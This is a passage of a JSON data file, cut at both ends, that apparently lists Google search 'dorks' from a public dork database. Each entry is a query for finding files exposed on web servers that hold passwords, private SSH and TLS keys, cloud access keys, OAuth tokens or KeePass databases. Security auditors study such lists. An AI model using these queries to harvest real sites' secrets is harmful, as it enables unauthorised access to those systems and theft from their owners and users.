dspace\" \"db.password =\"\r\n\r\n# By using this dork, usernames and passwords in configuration files can be\r\nfound.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:cfg intext:\"srb.username.1=\" \"srb.password.1 = \"", "description": "# Google Dork: inurl:cfg intext:\"srb.username.1=\" \"srb.password.1 = \"\r\n\r\n# By using this dork, usernames and passwords in configuration files can be\r\nfound.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:cfg tac_plus.cfg", "description": "# Google Dork: ext:cfg tac_plus.cfg\r\n\r\n# By using this dork, admin passwords and much more, in configuration files\r\ncan be found.\r\n\r\n# Date: 21/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "filetype:reg reg [HKEY_CURRENT_USERSoftware] -git", "description": "# Google Dork: filetype:reg reg [HKEY_CURRENT_USER\\Software\\] -git\r\n\r\n# By using this dork, some passwords for WinVNC and FAR plugins for Mail,\r\nFTP and ProxyFTP can be found.\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "filetype:reg reg HKEY_CLASSES_ROOT -git", "description": "# Google Dork: filetype:reg reg HKEY_CLASSES_ROOT -git\r\n\r\n# By using this dork, the HKEY_CLASSES_ROOT (HKCR) key that contains file\r\nname extension associations and COM class registration information such as\r\nProgIDs, CLSIDs, and IIDs. can be found.\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "filetype:reg reg HKEY_USERS -git", "description": "# Google Dork: filetype:reg reg HKEY_USERS -git\r\n\r\n# By using this dork, the HKEY_USERS contains user-specific configuration\r\ninformation for all currently active users on a computer can be found.\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" cvsweb.conf", "description": "# Google Dork: intitle:\"index of\" cvsweb.conf\r\n\r\n# By using this dork, cvsweb configuration files with juicy information and\r\nsometimes with exposed passwords can be found.\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"Current Configuration:\" ext:cfg -git", "description": "# Google Dork: intext:\"Current Configuration:\" ext:cfg -git\r\n\r\n# By using this dork, some user names and passwords in configuration files\r\ncan be found.\r\n\r\n# Date: 7/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"vpn-config.*\"", "description": "This dork found some juicy information about the vpn-config file.\r\n\r\nGoogle Dork : intitle:\"index of\" \"vpn-config.*\"\r\n\r\nAuthor : Berat ISLER (root1x)"}, {"dork": "intitle:\"index of\" default.rdp", "description": "Description: intitle:\"index of\" default.rdp\r\nThis google dork gives us the Remote Desktop Protocol Connection\r\nInformation.\r\nRDP contains juicy information about settings and credentials of windows\r\ncomputer."}, {"dork": "intitle:\"index of\" errorlog.txt", "description": "# Google Dork: intitle:\"index of\" errorlog.txt\r\n\r\n# Juicy information, and sometimes usernames and passwords can be found.\r\n\r\n# Date: 17/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"-----BEGIN OpenVPN Static key V1-----\" ext:key", "description": "# Google Dork: \"-----BEGIN OpenVPN Static key V1-----\" ext:key\r\n\r\n# OpenVPN static keys.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"-----BEGIN CERTIFICATE-----\" ext:pem -git", "description": "# Google Dork: \"-----BEGIN CERTIFICATE-----\" ext:pem -git\r\n\r\n# Various certificates including ssl, root, X509, etc.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"SecretAccessKey\" OR \"AccessKeyId\" ext:txt OR ext:cfg -git", "description": "# Google Dork: \"SecretAccessKey\" OR \"AccessKeyId\" ext:txt OR ext:cfg -git\r\n\r\n# Configuration files containing credentials.\r\n\r\n# Date: 23/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of\" db_mysql.inc", "description": "# Google Dork: intitle:\"Index of\" db_mysql.inc\r\n\r\n# Configuration files containing some times database usernames and\r\npasswords.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of\" db.inc", "description": "# Google Dork: intitle:\"Index of\" db.inc\r\n\r\n# Configuration files containing some times database usernames and\r\npasswords.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"DBPassword\" ext:cfg OR ext:log OR ext:txt OR ext:sql -git", "description": "# Google Dorks: \r\n\"DBPassword\" ext:cfg OR ext:log OR ext:txt OR ext:sql -git\r\n\"DBUsername\" ext:cfg OR ext:log OR ext:txt OR ext:sql -git\r\n\r\n# By using this dork some exposed database passwords can be found.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"syslog\"", "description": "#Description: intitle:\"index of\" \"syslog\"\r\nThis Google dork shows juicy information about the website and their system\r\nlogs.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 28 April 2020"}, {"dork": "intitle:\"index of\" \"/cron.log\"", "description": "#Description: intitle:\"index of\" \"/cron.log\"\r\nThis Google dork shows juicy information about the website and their\r\ncrontab logs.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 28 April 2020"}, {"dork": "intitle:\"index of\" keepass.kdbx OR database.kdbx", "description": "# Google Dork: intitle:\"index of\" keepass.kdbx OR database.kdbx\r\n\r\n# KeePass database key file in open web directories.\r\n\r\n# Date: 28/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" apache.log", "description": "Dork: intitle: \"index of\" apache.log\r\nDescription: This Google dork shows juicy information about the website and\r\nfinds out publicly available *apache logs* that contain sensitive\r\ninformation & can be exploited by the hacker.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" machine.config", "description": "Dork: intitle:\"index of\" machine.config\r\nDescription: This Google dork lists out machine.config files for asp .net\r\nwebsites\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" /known_hosts", "description": "# Google Dork: intitle:\"index of\" /known_hosts\r\n\r\n# List of pubkeys of known SSH servers.\r\n\r\n# Date: 29/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" /.ssh/id_rsa OR id_rsa.pub", "description": "# Google Dork: \r\nintitle:\"index of\" /.ssh/id_rsa OR id_rsa.pub\r\nintitle:\"index of\" /ssh_host_ecdsa_key OR ssh_host_ecdsa_key.pub\r\nintitle:\"index of\" /ssh_host_rsa_key OR ssh_host_rsa_key.pub\r\nintitle:\"index of\" /ssh_host_key OR ssh_host_key.pub\r\nintitle:\"index of\" /id_ecdsa OR id_ecdsa.pub\r\nintitle:\"index of\" /.ssh/id_dsa OR id_dsa.pub\r\n\r\n# RSA private and public keys.\r\n\r\n# Date: 29/04/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" db.json", "description": "Dork: intitle:\"index of\" db.json\r\nDescription: This Google dork lists out sensitive .json database files for\r\nwebsites\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" license-key.txt", "description": "Dork: intitle:\"index of\" license-key.txt\r\nDescription: This Google dork lists out license keys leaked for various\r\nsoftware/services.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" settings.xml", "description": "Dork: intitle:\"index of\" settings.xml\r\nDescription: This Google dork lists out sensitive settings.xml files for\r\napps/websites.\r\nAuthor: Abhi Chitkara"}, {"dork": "\"settings.ini\" intext:\"fbconnectkey =\" intext:\"msverify =\"", "description": "# Google Dork: \"settings.ini\" intext:\"fbconnectkey =\" intext:\"msverify =\"\r\n\r\n# Juicy information located into settings.ini files.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"keys.ini\"", "description": "# Google Dork: intitle:\"index of\" \"keys.ini\"\r\n\r\n# Juicy information located into keys.ini files. Various Windows\r\nactivation keys categorized by #OS|Type|Brand|Key.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"credentials.json\"", "description": "# Google Dork: intitle:\"index of\" \"credentials.json\"\r\n\r\n# Juicy information including credentials, client IDs, tokens and more.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"client_secret.json\" OR \"client secret\" OR \"client_secret live.json\"", "description": "# Google Dork: intitle:\"index of\" \"client_secret.json\" OR \"client secret\"\r\nOR \"client_secret live.json\"\r\n\r\n# Juicy information including credentials, client IDs, tokens and more.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"token.json\"", "description": "# Google Dork: intitle:\"index of\" \"token.json\"\r\n\r\n# Juicy information including access tokens and more.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" /insecure_private_key", "description": "# Google Dork: intitle:\"index of\" /insecure_private_key\r\n\r\n# RSA private keys.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"credentials.ini\"", "description": "# Google Dork: intitle:\"index of\" \"credentials.ini\"\r\n\r\n# Juicy information including some times access tokens, user names,\r\npasswords and more.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"dovecot.key\" OR \"dovecot.crt.cache\" OR \"dovecot.crt\"", "description": "# Google Dork: intitle:\"index of\" \"dovecot.key\" OR \"dovecot.crt.cache\" OR\r\n\"dovecot.crt\"\r\n\r\n# Juicy information and sensitive directories which in many cases are\r\nrestricted. However, there is lots of nice information into\r\nthe \"dovecot.crt.cache\" files.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"users.ini\"", "description": "Dork: intitle:\"index of\" \"users.ini\"\r\nDescription: This Google dork lists out sensitive user.ini files which\r\ncontain user parameters for a particular website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"/accounts.txt\"", "description": "#Description: intitle:\"index of\" \"/accounts.txt\"\r\nThis Google dork shows juicy information about the website and their\r\nsensitive data.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 30 April 2020"}, {"dork": "intitle:\"index of\" dataSources.local.xml", "description": "Dork: intitle:\"index of\" dataSources.local.xml\r\nDescription: This Google dork lists out sensitive local database\r\nconfiguration parameters for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" apis.json", "description": "Dork: intitle:\"index of\" apis.json\r\nDescription: This Google dork lists out sensitive api credentials and\r\nparameters for apis running on a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" admin.txt", "description": "Dork: intitle:\"index of\" admin.txt\r\nDescription: This Google dork lists out admin login credentials stored in a\r\nfile named \"admin.txt\" for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"parameters.yml.test\" OR \"parameters.yml.dist\"", "description": "# Google Dork: intitle:\"index of\" \"parameters.yml.test\" OR\r\n\"parameters.yml.dist\"\r\n\r\n# Juicy information and sensitive directories including mostly secret\r\ntokens, user names and some times passwords.\r\n\r\n# Date: 1/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"docker-cloud.yml\"", "description": "# Google Dork: \r\nintitle:\"index of\" \"docker-cloud.yml\"\r\nintitle:\"index of\" \"docker-compose.dev.yml\" OR \"docker-compose.prod.yml\" OR \"docker-compose.test.yml\"\r\n\r\n# Juicy information and sensitive directories including user names and\r\npasswords.\r\n\r\n# Date: 1/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"application.yml\"", "description": "# Google Dork: intitle:\"index of\" \"application.yml\"\r\n\r\n# Juicy information and sensitive directories including in many case,\r\nmostly secret tokens, user names and passwords.\r\n\r\n# Date: 1/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"database.json\"", "description": "# Google Dork: intitle:\"index of\" \"database.json\"\r\n\r\n# By using this dork, user names, passwords and database credentials some\r\ntimes can be found.\r\n\r\n# Date: 1/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"laravel\" ext:env intext:\"db_password\" -git", "description": "# Google Dork: intext:\"laravel\" ext:env intext:\"db_password\" -git\r\n\r\n# Laravel Database credentials.\r\n\r\n# Date: 1/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"accounts.json\"", "description": "Dork: \r\nintitle:\"index of\" \"accounts.json\"\r\nintitle:\"index of\" \"accounts.rar\"\r\n\r\nDescription: This Google dork lists out account details stored in a file\r\nnamed \"account.json\" for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"admin.bak\"", "description": "Dork: intitle:\"index of\" \"admin.bak\"\r\nDescription: This Google dork lists out admin backup files for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"settings.yaml\"", "description": "Dork: intitle:\"index of\" \"settings.yaml\"\r\nDescription: This Google dork lists out sensitive configuration files\r\nstored in the \"settings.yaml\" for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"api.yaml\"", "description": "Dork: intitle:\"index of\" \"api.yaml\"\r\nDescription: This Google dork lists out sensitive api configuration data\r\nstored in the \"api.yaml\" file for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"client_id.json\"", "description": "Dork: intitle:\"index of\" \"client_id.json\"\r\nDescription: This Google dork lists out sensitive client ids stored in the\r\n\"client_id.json\" file for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"/config.bak\"", "description": "#Description: intitle:\"index of\" \"/config.bak\"\r\nThis Google dork shows juicy information about the configuration files of\r\nthe website and some sensitive directories.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 3 May2020"}, {"dork": "intitle:\"index of\" \"/yum.log\"", "description": "#Description: intitle:\"index of\" \"/yum.log\"\r\nThis Google dork shows juicy information about the website and their yum\r\nlogs.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 3 May 2020"}, {"dork": "intitle:\"index of\" \"/users.xls\"", "description": "#Description : intitle:\"index of\" \"/users.xls\"\r\nThis Google dork shows juicy information about the website and their\r\nusernames in excel format.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 3 May 2020"}, {"dork": "intitle:\"index of\" \"Logins.txt\"", "description": "# Google Dork: intitle:\"index of\" \"Logins.txt\"\r\n\r\n# Juicy information and sensitive directories including in many case, user\r\nnames and passwords.\r\n\r\n# Date: 5/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"keys.asc\"", "description": "# Google Dork: intitle:\"index of\" \"keys.asc\"\r\n\r\n# Juicy information and sensitive directories.\r\n\r\n# Date: 5/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"login.txt\"", "description": "Exposes the login.txt file containing login credentials\r\n\r\n-Juveria Banu"}, {"dork": "intitle:\"index of\" \"auth.log\"", "description": "Dork: intitle:\"index of\" \"auth.log\"\r\nDescription: This Google dork lists out sensitive auth logs stored in a\r\n\"auth.log\" file for a linux web-server.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" users.bak", "description": "Dork: intitle:\"index of\" users.bak\r\nDescription: This Google dork lists out sensitive user data backups stored\r\nin a \"users.bak\" file for a web-server.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=", "description": "Dork:\r\ninurl:administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=\r\nDescription: This Google dork lists out config details for a administrator\r\ncomponents of a web-server.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"secret.js\"", "description": "Dork: intitle:\"index of\" \"secret.js\"\r\nDescription: This google dork lists out sites secret javascript files for a\r\nweb server.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"local.json\"", "description": "Dork: intitle:\"index of\" \"local.json\"\r\nDescription: This google dork lists out local configuration settings for a\r\nweb server.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"oauth-credentials.json\"", "description": "Dork: \r\nintitle:\"index of\" \"oauth-credentials.json\"\r\nintitle:\"index of\" \"oauth.json\"\r\n\r\nDescription: This google dork lists oauth credentials for a webserver.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"backup.js\"", "description": "Dork: \r\nintitle:\"index of\" \"backup.js\"\r\nintitle:\"index of\" \"backup.json\"\r\n\r\nDescription: This google dork lists out the javascript backup logic for\r\nwebsites.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"debian-security.log\"", "description": "Dork: \r\nintitle:\"index of\" \"debian-security.log\"\r\nintitle:\"index of\" \"linux.log\"\r\n\r\nDescription: This google dork lists out the debian security logs for\r\nwebsites.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"auth.asc\"", "description": "Dork: \r\nintitle:\"index of\" \"auth.asc\"\r\nintitle:\"index of\" \"auth.txt\"\r\n\r\nDescription: This google dork lists out sensitive information regarding\r\nauthentication.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"security.json\"", "description": "Dork: intitle:\"index of\" \"security.json\"\r\nDescription: This google dork lists out sensitive security logs in web\r\nservers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"google-api-private-key.json\"", "description": "Dork: intitle:\"index of\" \"google-api-private-key.json\"\r\nDescription: This google dork lists out google api private keys in web\r\nservers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"secrets.py\"", "description": "Dork: intitle:\"index of\" \"secrets.py\"\r\nDescription: This google dork lists secret python files in a webserver.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"cfg.go\"", "description": "The configuration file of the websites using GOLANG in backend can be\r\neasily found by using this dork\r\n\r\nDORK: intitle:\"index of\" \"cfg.go\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"index of\" \"config.rb\"", "description": "This dork is used to find the configuration files of websites using Ruby in\r\nbackend.\r\n\r\nDORK: intitle:\"index of\" \"config.rb\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"index of\" \"login.docx\"", "description": "Find sensitive information using this dork.\r\n\r\nDORK: intitle:\"index of\" \"login.docx\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"index of\" \"config.pl\"", "description": "This can be used to find the configuration file of a website using Perl in\r\nbackend.\r\n\r\nDORK: intitle:\"index of\" \"config.pl\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"index of\" \"manage.py\"", "description": "The configuration file of websites using DJANGO (Python) as backend.\r\n\r\nDORK: intitle:\"index of\" \"manage.py\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"index of\" \"config.js\"", "description": "Using this dork, the configuration file of websites using Express Js as\r\nbackend can be found.\r\n\r\nDORK: intitle:\"index of\" \"config.js\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"Index of\" test.logs", "description": "# Google Dork: intitle:\"Index of\" test.logs\r\n\r\n# Juicy information and sensitive directories.\r\n\r\n# Date: 6/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"queue.log\"", "description": "# Google Dork: intitle:\"index of\" \"queue.log\"\r\n\r\n# Juicy information and sensitive directories, including usernames, unique\r\nIDs and more.\r\n\r\n# Date: 6/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"web.log\" OR \"web.logs\"", "description": "# Google Dork: intitle:\"index of\" \"web.log\" OR \"web.logs\"\r\n\r\n# Juicy information and sensitive directories, including usernames, unique\r\nIDs and more.\r\n\r\n# Date: 6/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"admin.jsp\"", "description": "Dork: intitle:\"index of\" \"admin.jsp\"\r\nDescription: This Google dork lists out sensitive admin java servlet pages\r\nfor a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"postgresql.conf\"", "description": "Dork: intitle:\"index of\" \"postgresql.conf\"\r\nDescription: This Google dork lists out sensitive config data for the\r\npostgresql database on a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"Index of\" \"backup-audio-queue.log\" OR \"backup-audio.log\" OR \"backup-mysql.log\"", "description": "# Google Dork: intitle:\"Index of\" \"backup-audio-queue.log\" OR \"backup-audio.log\" OR \"backup-mysql.log\"\r\n\r\n# Juicy information.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"token_info.json\" OR \"get_access_token.json\"", "description": "# Google Dork: intitle:\"index of\" \"token_info.json\" OR \"get_access_token.json\"\r\n\r\n# Juicy information.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"fullchain.pem\" OR \"chain.pem\"", "description": "# Google Dork: intitle:\"index of\" \"fullchain.pem\" OR \"chain.pem\"\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"users.txt\"", "description": "# Google Dork: intitle:\"index of\" \"users.txt\"\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of\" \"ca-key.pem\" OR \"ca-req.pem\"", "description": "# Google Dork: \r\nintitle:\"Index of\" \"ca-key.pem\" OR \"ca-req.pem\"\r\nintitle:\"index of\" \"rsa8192.pem\"\r\nintitle:\"index of\" \"server.pem\"\r\nintitle:\"index of\" \"s512-key.pem\" OR \"s1024key.pem\"\r\nintitle:\"index of\" \"dsa512.pem\" OR \"dsa1024.pem\" OR \"dsap.pem\"\r\nintitle:\"index of\" \"dh512.pem\" OR \"dh1024.pem\" OR \"dh2048.pem\" OR \"dh4096.pem\"\r\nintitle:\"index of\" \"dsa-ca.pem\" OR \"dsa-pca.pem\"\r\nintitle:\"index of\" \"pca-cert.pem\" OR \"ca-cert.pem\"\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"index of\" \"wp-config.zip\"", "description": "Dork: \"index of\" \"wp-config.zip\"\r\nDescription: This Google dork can be used to discover publicly available\r\nZIP files containing wp-config.php file which has sensitive WordPress\r\ninformation.\r\nAuthor: Jinson Varghese Behanan (@JinsonCyberSec)\r\nAuthor Homepage: https://www.jinsonvarghese.com"}, {"dork": "intitle:\"index of\" \"cassandra-yaml\"", "description": "Dork: intitle:\"index of\" \"cassandra-yaml\"\r\nDescription: This Google dork lists out sensitive data for the cassandra\r\ndbms on a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"configure.in\"", "description": "Dork: intitle:\"index of\" \"configure.in\"\r\nDescription: This Google dork lists out sensitive data for the altibase\r\ndbms on a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"user data.txt\"", "description": "Dork: intitle:\"index of\" \"user data.txt\"\r\nDescription: This Google dork lists out sensitive user data for a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"jsapi_ticket.json\"", "description": "Dork: intitle:\"index of\" \"jsapi_ticket.json\"\r\nDescription: This Google dork lists out sensitive jsapi data for a web\r\nserver\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"mvn-settings.xml\"", "description": "This Google dork finds Maven settings files on web servers.\r\n\r\nintitle:\"index of\" \"mvn-settings.xml\"\r\n \r\n--\r\nBlackBelu.ga"}, {"dork": "intitle:\"index of\" \"refresh_token.txt\" OR \"access_token.txt\" OR \"jsapi_ticket.txt\"", "description": "# Google Dork: intitle:\"index of\" \"refresh_token.txt\" OR \"access_token.txt\"\r\nOR \"jsapi_ticket.txt\"\r\n\r\n# Juicy and sensitive information including tokens and more.\r\n\r\n# Date: 9/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"*root.pem\"", "description": "# Google Dork: intitle:\"index of\" \"*root.pem\"\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 10/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"token.txt\"", "description": "Dork: intitle:\"index of\" \"token.txt\"\r\nDescription: This google dork lists out sensitive tokens used on a web\r\nserver.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"dhparams.pem\"", "description": "# Google Dork: \r\nintitle:\"index of\" \"dhparams.pem\"\r\nintitle:\"index of\" \"bundle.pem\"\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 13/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"wpadmin-secure.htaccess\"", "description": "AUTHOR: ABHIJITH A\r\nCATEGORY: Sensitive Directories\r\nDESCRIPTION: intitle:\"index of\" \"wpadmin-secure.htaccess\""}, {"dork": "intitle:\"index of\" \"privkey.pem\"", "description": "Dork: intitle:\"index of\" \"privkey.pem\"\r\nDescription: This google dork lists out secret private keys of a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of \" \"users.json\"", "description": "AUTHOR: ABHIJITH A\r\nDESCRIPTION : intitle:\"index of \" \"users.json\"\r\nInformation about user data is obtained"}, {"dork": "intitle:\"index of\" \"userdata.json\"", "description": "Dork: intitle:\"index of\" \"userdata.json\"\r\nDescription: This google dork lists out websites with sensitive user data\r\njson files.\r\nAuthor: Abhi Chitkara"}, {"dork": "intext:\"W E L C O M E to R O O T\" ext:cfg OR ext:log OR ext:txt", "description": "# Google Dork: intext:\"W E L C O M E to R O O T\" ext:cfg OR ext:log OR ext:txt\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 20/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"db.log\"", "description": "Dork: intitle:\"index of\" \"db.log\"\r\nDescription: This google dork lists out sensitive database logs for web\r\nservers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"properties.ini\"", "description": "Dork: intitle:\"index of\" \"properties.ini\"\r\nDescription: This google dork lists out sensitive properties of a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "ext:sql intext:\"-- phpMyAdmin SQL Dump", "description": "Google Dorks : ext:sql intext:\"-- phpMyAdmin SQL Dump\r\nDescription : Various page containing SQL Dump Page .\r\nAuthor : Anjali Prakash ."}, {"dork": "intitle:\"index of\" \"var/log/\"", "description": "Google Dork: intitle:\"index of\" \"var/log/\"\r\nDate: 2020-05-30\r\nExploit Author: Apurva Badave\r\nDescription: This Google dork shows juicy information about different logs used by\r\nthe website. Logs like connector.log, debug log,system.log, exception.log, etc\r\n\r\nThanks,\r\nApurva Badave"}, {"dork": "intitle:index of config.asp", "description": "Dork: intitle:index of config.asp\r\n\r\nDescription: This search brings up sites with \"config.asp\" files. this\r\nconfiguration file contains both a username and a password for an SQL\r\ndatabase.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "intitle:\"index of\" \"security.php\"", "description": "Dork: intitle:\"index of\" \"security.php\"\r\n\r\nDescription: This google dork lists out sensitive security logs in web\r\nservers.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "index.of:\"pcap\" -site:stackoverflow.com -site:github.com", "description": "Dork:\r\nindex.of:\"pcap\" -site:stackoverflow.com -site:github.com\r\n\r\nDescription:\r\nThis dork queries google and finds the Wireshark PCAP files within open directories.\r\n\r\nCategory:\r\nFiles Containing Juicy Info.\r\n\r\nAuthor:\r\nJadeWolf"}, {"dork": "intitle:\"index of\" \".config\"", "description": "Dork: intitle:\"index of\" \".config\"\r\nDescription: This google dorks lists out config folders on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:.drone.yml intext:git config user.email", "description": "Google Dork: inurl:.drone.yml intext:git config user.email\r\nAuthor: Rajat Sharma\r\nDate: 2020-06-04"}, {"dork": "intitle:\"index of\" \"adminsubscribeack.txt\"", "description": "Dork: intitle:\"index of\" \"adminsubscribeack.txt\"\r\nDescription: This google dorks lists out sensitive admin subscription data\r\non web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"log.bak\"", "description": "Dork: intitle:\"index of\" \"log.bak\"\r\nDescription: This google dorks lists out sensitive backup log files web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"ReportServer/Pages/ReportViewer.aspx\"", "description": "# Google Dork: inurl:\"ReportServer/Pages/ReportViewer.aspx\"\r\n# Description: Various page containing Report viewer\r\n# Author : Anjali Prakash\r\n# Date: 2020-06-04"}, {"dork": "intitle:\"index of\" \"database/config\"", "description": "# Dock : intitle:\"index of\" \"database/config\"\r\n# Description: This dork will find some juicy information about database configuration files - database/config\r\n\r\nAuthor : Ravi Pavan"}, {"dork": "intitle:\"index of\" \"auth_config.php\"", "description": 